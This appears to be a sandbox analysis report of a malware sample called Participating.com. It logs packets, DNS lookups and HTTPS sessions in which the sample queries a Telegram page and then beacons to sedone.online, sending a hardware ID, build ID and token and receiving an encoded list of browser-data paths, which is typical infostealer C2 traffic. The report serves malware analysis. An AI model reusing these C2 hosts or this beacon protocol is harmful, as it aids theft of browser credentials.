                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.853950977 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.853971004 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.854095936 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.854425907 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.860805035 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.175589085 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.182209015 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.182235003 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.182337999 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.182538033 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.187860966 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.503736973 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.509259939 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.509282112 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.509294033 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.509574890 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.516428947 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.831903934 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.838164091 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.838207006 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.838371038 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.838401079 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.838486910 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.844645977 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.167598963 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.182039976 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.182054996 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.182089090 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.182477951 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.189564943 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.510443926 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.515537977 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.515558004 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.515758991 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.515831947 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.521748066 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.839776039 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.845525026 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.845558882 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.845599890 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.845863104 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.874191999 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:00.874490023 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.194562912 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.194622040 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.199367046 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.199426889 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.199573040 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.199620962 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.252232075 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.280519009 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.550762892 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.597253084 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.612833023 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.612881899 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:01.612914085 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:48:02.091392040 CET4435345023.200.88.31192.168.2.8

                                                                                                                                                                                                                                                                ICMP Packets

                                                                                                                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.371722937 CET192.168.2.81.1.1.1c24e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:17.431565046 CET192.168.2.81.1.1.1c29f(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.453927994 CET192.168.2.81.1.1.1c2bd(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Dec 16, 2024 13:45:59.716845036 CET192.168.2.81.1.1.10xdc4Standard query (0)IuwKjpytGYqQ.IuwKjpytGYqQA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:37.994612932 CET192.168.2.81.1.1.10x7771Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.086894989 CET192.168.2.81.1.1.10xb2c2Standard query (0)sedone.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.733422041 CET192.168.2.81.1.1.10x2d7fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.733752012 CET192.168.2.81.1.1.10x29f1Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.208626032 CET192.168.2.81.1.1.10x689fStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.210082054 CET192.168.2.81.1.1.10xf708Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.130533934 CET192.168.2.81.1.1.10x5063Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.134114981 CET192.168.2.81.1.1.10x9332Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.123812914 CET192.168.2.81.1.1.10x71b1Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.123862028 CET192.168.2.81.1.1.10xfde7Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.703663111 CET192.168.2.81.1.1.10x5322Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.703860044 CET192.168.2.81.1.1.10x8f06Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.704943895 CET192.168.2.81.1.1.10xb02cStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.705298901 CET192.168.2.81.1.1.10x68fbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.778506994 CET192.168.2.81.1.1.10xe10bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.778997898 CET192.168.2.81.1.1.10x6a3eStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.472141027 CET192.168.2.81.1.1.10x2a69Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.472729921 CET192.168.2.81.1.1.10x718eStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.473676920 CET192.168.2.81.1.1.10x8387Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.474136114 CET192.168.2.81.1.1.10xbf5bStandard query (0)assets.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Dec 16, 2024 13:45:59.946110010 CET1.1.1.1192.168.2.80xdc4Name error (3)IuwKjpytGYqQ.IuwKjpytGYqQnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:38.131934881 CET1.1.1.1192.168.2.80x7771No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.402167082 CET1.1.1.1192.168.2.80xb2c2No error (0)sedone.online116.203.12.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.870940924 CET1.1.1.1192.168.2.80x29f1No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.877623081 CET1.1.1.1192.168.2.80x2d7fNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.347549915 CET1.1.1.1192.168.2.80x689fNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.349066019 CET1.1.1.1192.168.2.80xf708No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.646861076 CET1.1.1.1192.168.2.80x5647No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.825052023 CET1.1.1.1192.168.2.80x609aNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.825052023 CET1.1.1.1192.168.2.80x609aNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.276228905 CET1.1.1.1192.168.2.80x9332No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.361715078 CET1.1.1.1192.168.2.80x5063No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.267926931 CET1.1.1.1192.168.2.80x71b1No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.267926931 CET1.1.1.1192.168.2.80x71b1No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.371644020 CET1.1.1.1192.168.2.80xfde7No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.841986895 CET1.1.1.1192.168.2.80x5322No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.841986895 CET1.1.1.1192.168.2.80x5322No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.842006922 CET1.1.1.1192.168.2.80xb02cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.842006922 CET1.1.1.1192.168.2.80xb02cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.842021942 CET1.1.1.1192.168.2.80x8f06No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.846132040 CET1.1.1.1192.168.2.80x68fbNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.917495012 CET1.1.1.1192.168.2.80xe10bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.917495012 CET1.1.1.1192.168.2.80xe10bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.922132015 CET1.1.1.1192.168.2.80x6a3eNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.282402992 CET1.1.1.1192.168.2.80x8daeNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.282402992 CET1.1.1.1192.168.2.80x8daeNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.610693932 CET1.1.1.1192.168.2.80x2a69No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.610693932 CET1.1.1.1192.168.2.80x2a69No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.610693932 CET1.1.1.1192.168.2.80x2a69No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.610693932 CET1.1.1.1192.168.2.80x2a69No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.611375093 CET1.1.1.1192.168.2.80xbf5bNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.612114906 CET1.1.1.1192.168.2.80x8387No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                • t.me
                                                                                                                                                                                                                                                                • sedone.online
                                                                                                                                                                                                                                                                • www.google.com
                                                                                                                                                                                                                                                                • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                • https:
                                                                                                                                                                                                                                                                  • assets.msn.com
                                                                                                                                                                                                                                                                  • c.msn.com
                                                                                                                                                                                                                                                                  • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                  • browser.events.data.msn.com

                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                0192.168.2.849712149.154.167.994438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:39 UTC86OUTGET /detct0r HTTP/1.1
                                                                                                                                                                                                                                                                Host: t.me
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:46:40 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:39 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                Content-Length: 12323
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: stel_ssid=21bc063e498960a65f_4389036794589904343; expires=Tue, 17 Dec 2024 12:46:39 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Cache-control: no-store
                                                                                                                                                                                                                                                                X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                2024-12-16 12:46:40 UTC12323INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                1192.168.2.849713116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:42 UTC233OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:46:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:42 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:46:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                2192.168.2.849714116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:44 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EUAIEC2689RIEUKNOH47
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 256
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:46:44 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 45 55 41 49 45 43 32 36 38 39 52 49 45 55 4b 4e 4f 48 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 34 35 32 35 46 31 39 46 30 41 31 36 33 33 30 34 37 39 38 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 55 41 49 45 43 32 36 38 39 52 49 45 55 4b 4e 4f 48 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 45 55 41 49 45 43 32 36 38 39 52 49 45 55 4b 4e 4f 48 34 37 2d 2d 0d
                                                                                                                                                                                                                                                                Data Ascii: ------EUAIEC2689RIEUKNOH47Content-Disposition: form-data; name="hwid"D74525F19F0A1633047986-a33c7340-61ca------EUAIEC2689RIEUKNOH47Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------EUAIEC2689RIEUKNOH47--
                                                                                                                                                                                                                                                                2024-12-16 12:46:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:45 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:46:45 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|1|fe74653fe5362dc417272058eafcad35|1|0|1|1|0|50000|00


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                3192.168.2.849715116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:46 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AS268YUKFUSRQQ9RIM79
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:46:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 53 32 36 38 59 55 4b 46 55 53 52 51 51 39 52 49 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 36 38 59 55 4b 46 55 53 52 51 51 39 52 49 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 36 38 59 55 4b 46 55 53 52 51 51 39 52 49 4d 37 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------AS268YUKFUSRQQ9RIM79Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------AS268YUKFUSRQQ9RIM79Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------AS268YUKFUSRQQ9RIM79Cont
                                                                                                                                                                                                                                                                2024-12-16 12:46:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:47 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:46:47 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
